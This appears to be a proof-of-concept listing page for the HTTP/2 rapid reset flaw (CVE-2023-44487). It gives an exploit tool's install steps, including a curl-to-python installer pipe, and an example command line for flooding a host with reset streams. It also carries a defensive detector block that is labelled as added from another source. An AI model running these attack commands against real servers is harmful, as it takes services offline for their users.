CVE-2023-44487 PoC — Apache HTTP/2 Resource Management Error Vulnerability

Source
Associated Vulnerability
Title: Apache HTTP/2 Resource Management Error Vulnerability (CVE-2023-44487)
Description:The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
Description
A python based exploit to test out rapid reset attack (CVE-2023-44487)
Readme
# HTTP2 Rapid Reset Attack: CVE-2023-44487
Quick exploit to test out the rapid reset attack (CVE-2023-44487). Note: for educational purposes only.

## Table of Contents

- [Installation](#installation)
- [Usage](#usage)

## Installation

Clone the repository to your local machine using Git, install Poetry, and run the program:

```bash
git clone https://github.com/studiogangster/CVE-2023-44487.git

cd CVE-2023-44487

# Install Poetry, if you haven't already:
curl -sSL https://install.python-poetry.org | python -

# Install the project dependencies:
poetry install

# Activate the virtual environment created by Poetry:
poetry shell

# Show help:
python main.py

# Example:
python main.py --host example.com --path /api --headers "Authorization: Basic dummy-token ; Custom-Header:Custom-Header-Value" --port 443 --requests_count 100  --max_streams 20 --parallel_connections 2
```

## Usage
```text
Usage: main.py [OPTIONS]

Options:
  --host TEXT                     Host URL  [required]
  --path TEXT                     Path on the host  [required]
  --headers TEXT                  Headers (comma-separated)  [required]
  --port INTEGER                  Port number  [required]
  --requests_count INTEGER        Number of requests to be sent  [required]
  --max_streams INTEGER           Maximum streams to be opened in parallel
                                  [required]
  --parallel_connections INTEGER  Number of parallel connections to be made
                                  with the server. (TCP connection)
                                  [required]
  --help                          Show this message and exit.

```
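
On the server side, the pattern named in the vulnerability description (request cancellation resetting many streams quickly) can be recognised per connection. The following detector is an added example, not code from the repository; the event tuple format, the thresholds and the sample data are assumptions constructed here.

```python
from collections import defaultdict, deque

def detect_rapid_reset(events, window=1.0, quick=0.05, min_resets=20, min_ratio=0.8):
    """Flag connections whose client cancels most streams right after opening them.

    events: (timestamp_s, conn_id, event, stream_id) tuples; this format and all
    thresholds are assumptions of this example, to be tuned against real traffic.
    Returns {conn_id: peak number of quick resets seen inside one window}.
    """
    opened = defaultdict(dict)        # conn -> {stream_id: time HEADERS arrived}
    total_opened = defaultdict(int)   # conn -> streams the client has opened
    total_quick = defaultdict(int)    # conn -> streams reset within `quick` seconds
    recent = defaultdict(deque)       # conn -> quick-reset timestamps in the window
    flagged = {}
    for ts, conn, event, stream in sorted(events, key=lambda e: e[0]):
        if event == "HEADERS":
            opened[conn][stream] = ts
            total_opened[conn] += 1
        elif event == "END_STREAM":   # request ran to completion
            opened[conn].pop(stream, None)
        elif event == "RST_STREAM":
            start = opened[conn].pop(stream, None)
            if start is None or ts - start > quick:
                continue              # unknown stream, or an ordinary late cancel
            total_quick[conn] += 1
            q = recent[conn]
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()
            ratio = total_quick[conn] / total_opened[conn]
            if len(q) >= min_resets and ratio >= min_ratio:
                flagged[conn] = max(flagged.get(conn, 0), len(q))
    return flagged

def sample_events():
    """Constructed sample: c1 behaves like a normal client, c2 opens and cancels."""
    ev = []
    for i in range(30):               # c1: requests complete, one late cancel
        sid, t = 2 * i + 1, i * 0.2
        ev += [(t, "c1", "HEADERS", sid), (t + 0.1, "c1", "END_STREAM", sid)]
    ev += [(6.0, "c1", "HEADERS", 61), (6.3, "c1", "RST_STREAM", 61)]
    for i in range(100):              # c2: every stream reset 1 ms after opening
        sid, t = 2 * i + 1, i * 0.002
        ev += [(t, "c2", "HEADERS", sid), (t + 0.001, "c2", "RST_STREAM", sid)]
    return ev

if __name__ == "__main__":
    print(detect_rapid_reset(sample_events()))
```

Requiring both a reset count inside the window and a high reset-to-open ratio keeps a client that occasionally cancels a slow request from being flagged.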





File Snapshot

```
[4.0K] /data/pocs/41804f685791039b5c9ff5b34dd135bf42c365c5
├── [ 11K] LICENSE
├── [8.6K] main.py
├── [ 35K] poetry.lock
├── [ 393] pyproject.toml
└── [1.7K] README.md

0 directories, 5 files
```